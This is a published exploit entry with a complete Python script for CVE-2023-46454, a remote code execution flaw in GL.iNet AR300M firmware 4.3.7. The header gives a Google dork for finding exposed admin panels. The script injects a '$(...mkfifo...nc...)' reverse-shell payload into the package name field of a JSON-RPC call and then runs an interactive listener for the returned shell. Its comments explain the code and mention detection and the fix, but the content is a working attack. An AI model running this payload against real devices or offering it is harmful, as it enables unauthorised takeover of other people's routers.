GL.iNet AR300M 4.3.7 Remote Code Execution

Related Vulnerabilities: CVE-2023-46454  
Publish Date: 04 Mar 2024
                							

                #!/usr/bin/env python3

# Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: XX/11/2023
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://www.gli-net.com
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
# Version: 4.3.7
# Tested on: GL.iNet AR300M
# CVE: CVE-2023-46454

import socket
import requests
import readline
from time import sleep
from random import randint
from sys import stdout, argv
from threading import Thread

# Silences urllib3's InsecureRequestWarning so the verify=False POST in
# trigger_revshell() does not print a warning. disable_warnings() installs a
# process-wide warnings filter, so every unverified TLS request made from this
# interpreter goes quiet, not just that one call.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def trigger_revshell(url: str, auth_token: str, payload: str) -> None:
  """Send the one JSON-RPC request in which *payload* reaches the device.

  Args:
    url: the target's ``/rpc`` endpoint (main() appends the path).
    auth_token: an already-valid session token passed as the first RPC
      parameter; the script assumes authenticated access and does no
      login itself.
    payload: the string spliced into the ``name`` argument of
      ``plugins.get_package_info``.

  The request is sent once with TLS verification disabled and the HTTP
  response is discarded; whether anything happened is observable only
  through the listener in revshell_listen(). On the device side the
  defect being exercised is that a caller-supplied package name is
  accepted without validation — a strict allow-list pattern for ``name``
  (or never handing it to a shell) is the fix.
  """
  # Presumably gives revshell_listen(), which main() starts right after this
  # thread, a moment to bind before the request lands — verify against caller.
  sleep(0.25)
  data = {
    'jsonrpc': '2.0',
    'id': randint(1000, 9999),
    'method': 'call',
    'params': [
      auth_token,
      'plugins',
      'get_package_info',
      # The payload is inserted into the middle of the package name
      # 'base-files' (between 'bas' and 'e-files'), not appended to it; the
      # reason for that position is not visible in this script.
      {'name': 'bas{}e-files'.format(payload)}
    ]
  }
  # verify=False: certificate errors on the target are ignored. Fine for a
  # lab device; it also means the token in `data` can be read by anyone able
  # to interpose on the path.
  requests.post(url, json=data, verify=False)

def get_command_response(s: socket.socket) -> str:
  """Read from *s* one byte at a time until the socket's timeout fires.

  Args:
    s: a connected socket whose timeout the caller has already set
      (revshell_listen() uses 2 seconds).

  Returns:
    The accumulated text. Two caveats follow directly from the loop:
    every byte is decoded on its own, so any byte that is not valid
    UTF-8 by itself (i.e. every part of a multi-byte character) raises
    UnicodeDecodeError and is silently dropped; and if the peer closes
    the connection, recv() returns b'' immediately without a timeout,
    so the loop never exits. A caller that wants a clean shutdown would
    have to check for an empty read.
  """
  res = ''
  while True:
    try:
      resp = s.recv(1).decode('utf-8')
      res += resp
    except UnicodeDecodeError:
      # Non-ASCII byte: dropped rather than buffered for a later decode.
      pass
    except socket.timeout:
      # The only exit from the loop: no data for the configured timeout.
      break
  return res

def revshell_listen(revshell_ip: str, revshell_port: str) -> None:
  """Bind a TCP listener on the operator's host and drive one interactive session.

  Args:
    revshell_ip: local address to bind; must be reachable from the device.
    revshell_port: local port as a string (it comes from argv); converted
      with int() here, so a non-numeric value raises ValueError inside the
      bind try-block and is reported as a generic bind failure.

  The function returns normally only via the 5-second accept() timeout or
  a KeyboardInterrupt; the read/write loop itself has no exit condition.
  On the timeout path the listening socket is closed, on the interrupt
  path both sockets are; no other path closes them.
  """
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  # Applies to accept() below: 5 s without an inbound connection is treated
  # as "not vulnerable".
  s.settimeout(5)

  try:
    s.bind((revshell_ip, int(revshell_port)))
    s.listen(1)
  except Exception as e:
    # Only the exception type is printed (e.g. PermissionError for a
    # privileged port, OSError for an address already in use); the message
    # is dropped. `exit` is the site-module builtin, not sys.exit.
    print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
    exit(1)

  try:
    clsock, claddr = s.accept()
    # Per-command read window used by get_command_response().
    clsock.settimeout(2)
    # accept() never returns a falsy socket, so this branch is always taken.
    if clsock:
      print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
      # `res` is assigned but never read.
      res = ''
      while True:
        command = input('$ ')
        clsock.sendall('{}\n'.format(command).encode('utf-8'))
        stdout.write(get_command_response(clsock))

  except socket.timeout:
    # Raised by accept(); a timeout inside the loop is already consumed by
    # get_command_response().
    print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
    s.close()

  except KeyboardInterrupt:
    print('\n[*] Closing connection')
    try:
      clsock.close()
    except socket.error:
      pass
    except NameError:
      # Ctrl-C before accept() returned: clsock was never bound.
      pass
    s.close()

def main(base_url: str, auth_token: str, revshell_ip: str, revshell_port: str) -> None:
  """Fire the RPC request from a background thread and block on the listener.

  Args:
    base_url: scheme and host of the target; '/rpc' is appended here.
    auth_token: valid session token for the target's JSON-RPC interface.
    revshell_ip: local address the device is expected to connect back to.
    revshell_port: local port for that connection, as given on argv.

  Ordering matters: the request thread sleeps 0.25 s before sending, and
  the listener is started on the main thread immediately after the thread
  is launched. The thread is not joined, so a request that fails after the
  listener has given up is never reported.
  """
  print('[+] Started GL.iNet <= 4.3.7 RCE exploit')

  # The payload is a shell command substitution; everything that follows
  # relies on the device evaluating the 'name' field in a shell. From a
  # detection standpoint this is the observable: an RPC package name
  # containing '$(' or other shell metacharacters, followed by an outbound
  # TCP connection from the device to an arbitrary host/port.
  payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)
  print('[+] Reverse shell payload: "{}"'.format(payload))

  print('[*] Triggering reverse shell connection')
  # Not joined; any exception inside the thread surfaces only as a traceback
  # on stderr and does not affect the listener.
  Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()

  print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
  revshell_listen(revshell_ip, revshell_port)

  print('[+] Done')

if __name__ == '__main__':
  # Positional arguments only; no parsing or validation beyond the count.
  # The port is handed through as a string and converted in revshell_listen().
  if len(argv) < 5:
    print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
    # `exit` here is the site-module builtin rather than sys.exit.
    exit(1)

  main(argv[1], argv[2], argv[3], argv[4])
            
